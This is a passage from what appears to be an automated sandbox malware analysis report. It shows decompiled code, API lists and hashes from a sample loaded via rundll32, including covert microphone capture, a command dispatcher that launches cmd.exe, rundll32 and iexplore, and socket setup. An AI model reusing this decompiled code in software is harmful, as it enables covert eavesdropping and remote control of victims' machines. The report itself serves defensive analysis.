                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000020,00000000,00000108), ref: 04261B23
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04261B4C
                                                                                              • CloseHandle.KERNEL32(?), ref: 04261B55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$CloseCursorHandleLoadObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 3220371329-3916222277
                                                                                              • Opcode ID: 7056e7cc29e18ba1967ad8989a32ab30399956f99ec73f60a1f5d368d5d41cc5
                                                                                              • Instruction ID: b8b74e95e7dac4195d99fc9c6dd6122c7659b171e8cfe3577c26ae2ec6921025
                                                                                              • Opcode Fuzzy Hash: 7056e7cc29e18ba1967ad8989a32ab30399956f99ec73f60a1f5d368d5d41cc5
                                                                                              • Instruction Fuzzy Hash: E341A271F14344ABEB019FA8EC8979ABBB0FF14704F114259E904AE1D6DBB4A881CB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 55%
                                                                                              			E04261C30(intOrPtr __ecx, intOrPtr _a4) {
                                                                                              				void* _v20;
                                                                                              				char _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				char _v32;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t23;
                                                                                              				void* _t36;
                                                                                              				int _t38;
                                                                                              				intOrPtr _t42;
                                                                                              				intOrPtr* _t45;
                                                                                              				intOrPtr _t49;
                                                                                              				void* _t51;
                                                                                              
                                                                                              				_push(_t51);
                                                                                              				_t49 = __ecx;
                                                                                              				 *((char*)(__ecx + 0xc)) = 0;
                                                                                              				WaitForSingleObject( *(__ecx + 0x24), 0xffffffff);
                                                                                              				CloseHandle( *(_t49 + 0x24));
                                                                                              				_t45 =  *((intOrPtr*)(_t49 + 0xb0));
                                                                                              				_t59 = _t45;
                                                                                              				if(_t45 != 0) {
                                                                                              					 *((intOrPtr*)( *_t45))(1);
                                                                                              				}
                                                                                              				_t42 = _a4;
                                                                                              				_t23 = E04275B14(_t51, _t59, 0x108);
                                                                                              				if(_t42 != 3) {
                                                                                              					__eflags = _t42 - 7;
                                                                                              					if(_t42 != 7) {
                                                                                              						_push(0);
                                                                                              						_push(_t42);
                                                                                              					} else {
                                                                                              						_push(1);
                                                                                              						_push(8);
                                                                                              					}
                                                                                              				} else {
                                                                                              					_push(1);
                                                                                              					_push(4);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t49 + 0xb0)) = E042623F0(_t42, _t23, _t49, _t51);
                                                                                              				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 4,  *(_t49 + 0x18) & 0x000000ff);
                                                                                              				_t30 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                                                              				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 0x10,  ==  ? 0xcc0020 : 0x40cc0020);
                                                                                              				 *((intOrPtr*)(_t49 + 0x20)) = _t42;
                                                                                              				 *((char*)(_t49 + 0xc)) = 1;
                                                                                              				_v32 = E04262050;
                                                                                              				_v28 = _t49;
                                                                                              				_v24 = 1;
                                                                                              				_v20 = CreateEventW(0, 0, 0, 0);
                                                                                              				_t36 = E0427F897(0xcc0020, 0, 0, E04265400,  &_v32, 0, 0);
                                                                                              				WaitForSingleObject(_v20, 0xffffffff);
                                                                                              				_t38 = CloseHandle(_v20);
                                                                                              				 *(_t49 + 0x24) = _t36;
                                                                                              				return _t38;
                                                                                              			}

















                                                                                              0x04261c3a
                                                                                              0x04261c3c
                                                                                              0x04261c43
                                                                                              0x04261c47
                                                                                              0x04261c50
                                                                                              0x04261c56
                                                                                              0x04261c5c
                                                                                              0x04261c5e
                                                                                              0x04261c64
                                                                                              0x04261c64
                                                                                              0x04261c66
                                                                                              0x04261c6e
                                                                                              0x04261c76
                                                                                              0x04261c7e
                                                                                              0x04261c81
                                                                                              0x04261c89
                                                                                              0x04261c8b
                                                                                              0x04261c83
                                                                                              0x04261c83
                                                                                              0x04261c85
                                                                                              0x04261c85
                                                                                              0x04261c78
                                                                                              0x04261c78
                                                                                              0x04261c7a
                                                                                              0x04261c7a
                                                                                              0x04261c99
                                                                                              0x04261cae
                                                                                              0x04261cbe
                                                                                              0x04261ccc
                                                                                              0x04261cd6
                                                                                              0x04261cd9
                                                                                              0x04261cdd
                                                                                              0x04261ce5
                                                                                              0x04261ce9
                                                                                              0x04261cf8
                                                                                              0x04261d0a
                                                                                              0x04261d1a
                                                                                              0x04261d24
                                                                                              0x04261d2a
                                                                                              0x04261d33

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04261C47
                                                                                              • CloseHandle.KERNEL32(?), ref: 04261C50
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 04261CAE
                                                                                              • InterlockedExchange.KERNEL32(?,40CC0020), ref: 04261CCC
                                                                                              • CreateEventW.KERNEL32 ref: 04261CEE
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04261D1A
                                                                                              • CloseHandle.KERNEL32(?), ref: 04261D24
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CreateEvent
                                                                                              • String ID:
                                                                                              • API String ID: 939225815-0
                                                                                              • Opcode ID: c4bd3a039cc56b9a154c86f6e7e7297df787dd75f7e11be05a7cf19b1b853cc4
                                                                                              • Instruction ID: 39ec3f0027f93c94c1ce1e90d0dddacb4bb360e4b8fe0c6f194da8899c66f96c
                                                                                              • Opcode Fuzzy Hash: c4bd3a039cc56b9a154c86f6e7e7297df787dd75f7e11be05a7cf19b1b853cc4
                                                                                              • Instruction Fuzzy Hash: 2E31C371718301BFE710AB68DC49B5AFBA4FF08714F100319F6599A6C1DBB5B8A08B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042513D0(void* __ecx) {
                                                                                              				long _v8;
                                                                                              				char _v12;
                                                                                              				HWAVEIN* _t41;
                                                                                              				void* _t47;
                                                                                              				struct wavehdr_tag** _t49;
                                                                                              
                                                                                              				_t47 = __ecx;
                                                                                              				if(waveInGetNumDevs() != 0) {
                                                                                              					_v8 = 0;
                                                                                              					 *(_t47 + 0x2c) = CreateThread(0, 0, E04251550, __ecx, 4,  &_v8);
                                                                                              					_t41 = _t47 + 0x18;
                                                                                              					if(waveInOpen(_t41, 0xffff, _t47 + 0x46, _v8, 0, 0x20000) == 0) {
                                                                                              						_t49 = _t47 + 0x30;
                                                                                              						_v12 = 2;
                                                                                              						do {
                                                                                              							 *( *_t49) =  *(_t49 - 0x28);
                                                                                              							 *_t49->dwBufferLength =  *(_t47 + 4);
                                                                                              							 *_t49->dwFlags = 0;
                                                                                              							 *_t49->dwLoops = 0;
                                                                                              							waveInPrepareHeader( *_t41,  *_t49, 0x20);
                                                                                              							_t14 =  &_v12;
                                                                                              							 *_t14 = _v12 - 1;
                                                                                              							_t49 =  &(_t49[1]);
                                                                                              						} while ( *_t14 != 0);
                                                                                              						waveInAddBuffer( *_t41,  *(_t47 + 0x30 +  *(_t47 + 0x1c) * 4), 0x20);
                                                                                              						ResumeThread( *(_t47 + 0x2c));
                                                                                              						waveInStart( *_t41);
                                                                                              						 *((char*)(_t47 + 0x44)) = 1;
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						return 0;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}








                                                                                              0x042513d7
                                                                                              0x042513e1
                                                                                              0x042513ee
                                                                                              0x04251412
                                                                                              0x04251415
                                                                                              0x0425142a
                                                                                              0x04251435
                                                                                              0x04251438
                                                                                              0x04251440
                                                                                              0x04251447
                                                                                              0x0425144e
                                                                                              0x04251453
                                                                                              0x0425145c
                                                                                              0x04251467
                                                                                              0x0425146d
                                                                                              0x0425146d
                                                                                              0x04251471
                                                                                              0x04251471
                                                                                              0x04251481
                                                                                              0x0425148a
                                                                                              0x04251492
                                                                                              0x0425149a
                                                                                              0x042514a4
                                                                                              0x0425142c
                                                                                              0x04251433
                                                                                              0x04251433
                                                                                              0x042513e3
                                                                                              0x042513e9
                                                                                              0x042513e9

                                                                                              APIs
                                                                                              • waveInGetNumDevs.WINMM ref: 042513D9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,04251550,?,00000004,?), ref: 04251402
                                                                                              • waveInOpen.WINMM(00000004,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 04251422
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$CreateDevsOpenThread
                                                                                              • String ID:
                                                                                              • API String ID: 3981276002-0
                                                                                              • Opcode ID: fbc19e0954481032a67caebf8a6999bed5a341fde110464e29fb9f23f73c7c4c
                                                                                              • Instruction ID: 99075d8ca1d678f7f02c553d46e46d2ad2d9426123ffbe774e17a393cee8a0e1
                                                                                              • Opcode Fuzzy Hash: fbc19e0954481032a67caebf8a6999bed5a341fde110464e29fb9f23f73c7c4c
                                                                                              • Instruction Fuzzy Hash: B2216B31640205AFDB20DFA8EC49B95FBB8FF19304F100199EA0497650DBB2BD65DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 52%
                                                                                              			E04256C00(void* __ebx, void* __ecx, void* __edi, void* __esi, signed char _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				short _v532;
                                                                                              				char _v548;
                                                                                              				signed int _t15;
                                                                                              				signed int _t17;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              				void* _t33;
                                                                                              				signed int _t35;
                                                                                              				signed int _t37;
                                                                                              
                                                                                              				_t27 = __ecx;
                                                                                              				_t26 = __ebx;
                                                                                              				_t37 = (_t35 & 0xfffffff8) - 0x224;
                                                                                              				_t15 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t15 ^ _t37;
                                                                                              				_t17 = _a4 & 0x000000ff;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_t33 = __ecx;
                                                                                              				asm("movups [esp+0x8], xmm0");
                                                                                              				if(_t17 > 7) {
                                                                                              					L10:
                                                                                              					return E04275AFE(_v8 ^ _t37);
                                                                                              				} else {
                                                                                              					switch( *((intOrPtr*)(_t17 * 4 +  &M04256CF4))) {
                                                                                              						case 0:
                                                                                              							GetWindowsDirectoryW( &_v532, 0x104);
                                                                                              							lstrcatW( &_v532, L"\\explorer.exe");
                                                                                              							goto L9;
                                                                                              						case 1:
                                                                                              							_push(L"cmd.exe /c rundll32.exe shell32.dll,#61");
                                                                                              							goto L8;
                                                                                              						case 2:
                                                                                              							__eax = E04256880(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                                                              							_pop(__esi);
                                                                                              							__ecx = _v12;
                                                                                              							__ecx = _v12 ^ __esp;
                                                                                              							__eflags = __ecx;
                                                                                              							return E04275AFE(__ecx);
                                                                                              							goto L11;
                                                                                              						case 3:
                                                                                              							__eax = E04256960(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                                                              							_pop(__esi);
                                                                                              							__ecx = _v12;
                                                                                              							__ecx = _v12 ^ __esp;
                                                                                              							__eflags = __ecx;
                                                                                              							return E04275AFE(__ecx);
                                                                                              							goto L11;
                                                                                              						case 4:
                                                                                              							__eax = E04256A40(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                                                              							_pop(__esi);
                                                                                              							__ecx = _v12;
                                                                                              							__ecx = _v12 ^ __esp;
                                                                                              							__eflags = __ecx;
                                                                                              							return E04275AFE(__ecx);
                                                                                              							goto L11;
                                                                                              						case 5:
                                                                                              							goto L10;
                                                                                              						case 6:
                                                                                              							_push(L"cmd.exe /c start iexplore.exe");
                                                                                              							L8:
                                                                                              							 &_v532 = lstrcpyW( &_v532, ??);
                                                                                              							L9:
                                                                                              							_push( &_v548);
                                                                                              							_push( &_v532);
                                                                                              							_push(_t27);
                                                                                              							E042672E0(_t26,  *((intOrPtr*)(_t33 + 0x70)), _t39);
                                                                                              							_t37 = _t37 - 8 + 0x14;
                                                                                              							goto L10;
                                                                                              					}
                                                                                              				}
                                                                                              				L11:
                                                                                              			}














                                                                                              0x04256c00
                                                                                              0x04256c00
                                                                                              0x04256c06
                                                                                              0x04256c0c
                                                                                              0x04256c13
                                                                                              0x04256c1a
                                                                                              0x04256c1e
                                                                                              0x04256c22
                                                                                              0x04256c24
                                                                                              0x04256c2c
                                                                                              0x04256cdc
                                                                                              0x04256cee
                                                                                              0x04256c32
                                                                                              0x04256c32
                                                                                              0x00000000
                                                                                              0x04256c43
                                                                                              0x04256c53
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256c5b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256c63
                                                                                              0x04256c68
                                                                                              0x04256c69
                                                                                              0x04256c70
                                                                                              0x04256c70
                                                                                              0x04256c7a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256c7e
                                                                                              0x04256c83
                                                                                              0x04256c84
                                                                                              0x04256c8b
                                                                                              0x04256c8b
                                                                                              0x04256c95
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256c99
                                                                                              0x04256c9e
                                                                                              0x04256c9f
                                                                                              0x04256ca6
                                                                                              0x04256ca6
                                                                                              0x04256cb0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256cb3
                                                                                              0x04256cb8
                                                                                              0x04256cbd
                                                                                              0x04256cc3
                                                                                              0x04256cca
                                                                                              0x04256cd2
                                                                                              0x04256cd3
                                                                                              0x04256cd4
                                                                                              0x04256cd9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256c32
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 04256C43
                                                                                              • lstrcatW.KERNEL32(?,\explorer.exe), ref: 04256C53
                                                                                              • lstrcpyW.KERNEL32(?,cmd.exe /c rundll32.exe shell32.dll,#61), ref: 04256CBD
                                                                                              Strings
                                                                                              • \explorer.exe, xrefs: 04256C49
                                                                                              • cmd.exe /c start iexplore.exe, xrefs: 04256CB3
                                                                                              • cmd.exe /c rundll32.exe shell32.dll,#61, xrefs: 04256C5B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DirectoryWindowslstrcatlstrcpy
                                                                                              • String ID: \explorer.exe$cmd.exe /c rundll32.exe shell32.dll,#61$cmd.exe /c start iexplore.exe
                                                                                              • API String ID: 4189314281-3733130215
                                                                                              • Opcode ID: 940be2f0c95eabd783c4f52fd90f1086014786c12df0e56264b042cf5e2687fa
                                                                                              • Instruction ID: 1d63436af1c1f4897a721f9c3d07376d923844209556a16382209a45e562769b
                                                                                              • Opcode Fuzzy Hash: 940be2f0c95eabd783c4f52fd90f1086014786c12df0e56264b042cf5e2687fa
                                                                                              • Instruction Fuzzy Hash: 0D21F9727342046BC234FB78F8898ABB3ECEF58315F404A1EB84986090EE74F850C796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E04272220(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t23;
                                                                                              				long _t24;
                                                                                              				void* _t27;
                                                                                              				long _t32;
                                                                                              				intOrPtr* _t41;
                                                                                              				void* _t42;
                                                                                              				void* _t43;
                                                                                              
                                                                                              				_t41 = __ecx;
                                                                                              				if( *((intOrPtr*)( *__ecx + 0x118))() == 0) {
                                                                                              					L10:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					E0426EC90(__ecx + 0x174);
                                                                                              					if( *(__ecx + 0x54) != 3) {
                                                                                              						 *((intOrPtr*)(__ecx + 0x58)) = 1;
                                                                                              						SetLastError(0x139f);
                                                                                              						 *(_t41 + 0x174) = 0;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						 *(__ecx + 0x54) = 0;
                                                                                              						 *(__ecx + 0x174) = 0;
                                                                                              						 *((intOrPtr*)( *__ecx + 0x11c))();
                                                                                              						_t23 = E042723F0(__ebx, __ecx, __ecx, _t42, _a4);
                                                                                              						_t43 = GetLastError;
                                                                                              						if(_t23 == 0) {
                                                                                              							L8:
                                                                                              							_t24 = GetLastError();
                                                                                              							 *((intOrPtr*)( *_t41))();
                                                                                              							SetLastError(_t24);
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							_t27 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                              							 *(_t41 + 0x50) = _t27;
                                                                                              							if(_t27 == 0) {
                                                                                              								_t32 = GetLastError();
                                                                                              								 *((intOrPtr*)(_t41 + 0x58)) = 7;
                                                                                              								SetLastError(_t32);
                                                                                              							}
                                                                                              							if( *(_t41 + 0x50) == 0 || E04272510(_t41, _t41, _t43) == 0) {
                                                                                              								goto L8;
                                                                                              							} else {
                                                                                              								 *((intOrPtr*)(_t41 + 0x4c)) = _a8;
                                                                                              								 *((intOrPtr*)(_t41 + 0x54)) = 1;
                                                                                              								ResetEvent( *(_t41 + 0x3c));
                                                                                              								return 1;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}












                                                                                              0x04272225
                                                                                              0x04272231
                                                                                              0x04272308
                                                                                              0x0427230c
                                                                                              0x04272237
                                                                                              0x0427223d
                                                                                              0x04272246
                                                                                              0x042722f0
                                                                                              0x042722f7
                                                                                              0x042722fd
                                                                                              0x00000000
                                                                                              0x0427224c
                                                                                              0x0427224c
                                                                                              0x04272255
                                                                                              0x04272261
                                                                                              0x0427226c
                                                                                              0x04272271
                                                                                              0x04272279
                                                                                              0x042722d2
                                                                                              0x042722d2
                                                                                              0x042722da
                                                                                              0x042722dd
                                                                                              0x042722e8
                                                                                              0x0427227b
                                                                                              0x04272283
                                                                                              0x04272289
                                                                                              0x0427228e
                                                                                              0x04272290
                                                                                              0x04272293
                                                                                              0x0427229a
                                                                                              0x0427229a
                                                                                              0x042722a4
                                                                                              0x00000000
                                                                                              0x042722b1
                                                                                              0x042722b7
                                                                                              0x042722ba
                                                                                              0x042722c1
                                                                                              0x042722cf
                                                                                              0x042722cf
                                                                                              0x042722a4
                                                                                              0x04272279
                                                                                              0x04272246

                                                                                              APIs
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 042722F7
                                                                                                • Part of subcall function 042723F0: socket.WS2_32(?,00000001,00000006), ref: 04272459
                                                                                                • Part of subcall function 042723F0: bind.WS2_32(00000000,00000002,0000001C), ref: 0427247E
                                                                                                • Part of subcall function 042723F0: closesocket.WS2_32(00000000), ref: 042724B4
                                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?), ref: 04272283
                                                                                              • GetLastError.KERNEL32 ref: 04272290
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0427229A
                                                                                              • ResetEvent.KERNEL32(?), ref: 042722C1
                                                                                              • GetLastError.KERNEL32(?), ref: 042722D2
                                                                                              • SetLastError.KERNEL32(00000000), ref: 042722DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CompareCompletionCreateEventExchangeInterlockedPortResetSwitchThreadbindclosesocketsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1231050892-0
                                                                                              • Opcode ID: 1df617bd07ff6349408ee660f971111b3099b3285050658a5322367dd2408608
                                                                                              • Instruction ID: f31de69bd0a20fb69a35e6fcc2a277092f74b729645531ae89e247c5a31267e5
                                                                                              • Opcode Fuzzy Hash: 1df617bd07ff6349408ee660f971111b3099b3285050658a5322367dd2408608
                                                                                              • Instruction Fuzzy Hash: 85218E31314602EBE714AFB9E8087DAFBA9FF54325F144126E909C6680DF75F861CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E04266B70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				int _v620;
                                                                                              				int _v624;
                                                                                              				signed int _t20;
                                                                                              				signed int _t52;
                                                                                              
                                                                                              				_t20 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t20 ^ _t52;
                                                                                              				_v616 = 0;
                                                                                              				_v620 = 4;
                                                                                              				E04266050(__ebx, L"SEOID",  &_v88, __edi, __esi);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				E0427DEA0(__edi,  &_v616, 0, _v620);
                                                                                              				_v612 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                                                              					L3:
                                                                                              					return E04275AFE(_v8 ^ _t52);
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                                                              					_t51 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					_t58 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						return E04275AFE(_v8 ^ _t52);
                                                                                              					}
                                                                                              				}
                                                                                              			}












                                                                                              0x04266b79
                                                                                              0x04266b80
                                                                                              0x04266b87
                                                                                              0x04266b96
                                                                                              0x04266ba0
                                                                                              0x04266bb5
                                                                                              0x04266bcb
                                                                                              0x04266bd3
                                                                                              0x04266bfa
                                                                                              0x04266c52
                                                                                              0x04266c62
                                                                                              0x04266bfc
                                                                                              0x04266c1d
                                                                                              0x04266c30
                                                                                              0x04266c33
                                                                                              0x04266c39
                                                                                              0x04266c3b
                                                                                              0x00000000
                                                                                              0x04266c3d
                                                                                              0x04266c51
                                                                                              0x04266c51
                                                                                              0x04266c3b

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 04266BB5
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04266BF2
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,?,?), ref: 04266C1D
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04266C33
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue$wsprintf
                                                                                              • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 3615287298-3437544703
                                                                                              • Opcode ID: 657191e9e14805f534517e108121d1fcadb3de1b66ea06ea1bf06a9365399962
                                                                                              • Instruction ID: 1143a12433406470dbaf83c0c445482eed3c2d96b4265efd02131e0fab596628
                                                                                              • Opcode Fuzzy Hash: 657191e9e14805f534517e108121d1fcadb3de1b66ea06ea1bf06a9365399962
                                                                                              • Instruction Fuzzy Hash: D9212472A1522CABDB20EFA4DD49BEEB7BCEF44704F0001D5A90AA6144DA366E54CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E04264790(WCHAR* __ecx, WCHAR* __edx, void* __esi) {
                                                                                              				signed int _v0;
                                                                                              				signed int _v8;
                                                                                              				struct _SYSTEMTIME _v24;
                                                                                              				struct _SYSTEMTIME _v40;
                                                                                              				struct _FILETIME _v48;
                                                                                              				struct _FILETIME _v56;
                                                                                              				struct _FILETIME _v64;
                                                                                              				signed int _t16;
                                                                                              				WCHAR* _t45;
                                                                                              				signed int _t48;
                                                                                              
                                                                                              				_t50 = (_t48 & 0xfffffff8) - 0x3c;
                                                                                              				_t16 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t16 ^ (_t48 & 0xfffffff8) - 0x0000003c;
                                                                                              				_t45 = __edx;
                                                                                              				if(GetFileTime(CreateFileW(__ecx, 0, 1, 0, 3, 0x80, 0),  &_v64,  &_v48,  &_v56) != 0) {
                                                                                              					FileTimeToSystemTime( &_v64,  &_v24);
                                                                                              					SystemTimeToTzSpecificLocalTime(0,  &_v24,  &_v40);
                                                                                              					wsprintfW(_t45, L"%04d-%02d-%02d  %02d:%02d", _v40.wYear & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wDay & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff);
                                                                                              					return E04275AFE(_v0 ^ _t50 + 0x0000001c);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t50);
                                                                                              				}
                                                                                              			}













                                                                                              0x04264796
                                                                                              0x04264799
                                                                                              0x042647a0
                                                                                              0x042647b5
                                                                                              0x042647d5
                                                                                              0x042647f1
                                                                                              0x04264803
                                                                                              0x0426482d
                                                                                              0x0426484a
                                                                                              0x042647d7
                                                                                              0x042647e6
                                                                                              0x042647e6

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(-00000220,00000000,00000001,00000000,00000003,00000080,00000000,00000012), ref: 042647B7
                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?), ref: 042647CD
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 042647F1
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04264803
                                                                                              • wsprintfW.USER32 ref: 0426482D
                                                                                              Strings
                                                                                              • %04d-%02d-%02d %02d:%02d, xrefs: 04264827
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$CreateLocalSpecificwsprintf
                                                                                              • String ID: %04d-%02d-%02d %02d:%02d
                                                                                              • API String ID: 4290651727-1132360693
                                                                                              • Opcode ID: 0fc55f3d80bc182e6df32b95cd77fbc95a3584a9981c160f91e9d4a7313ff3e5
                                                                                              • Instruction ID: 97a1d68f8902e06ebfb3cd0f04fab4c38e13c344c686dc46d039ca00e4965048
                                                                                              • Opcode Fuzzy Hash: 0fc55f3d80bc182e6df32b95cd77fbc95a3584a9981c160f91e9d4a7313ff3e5
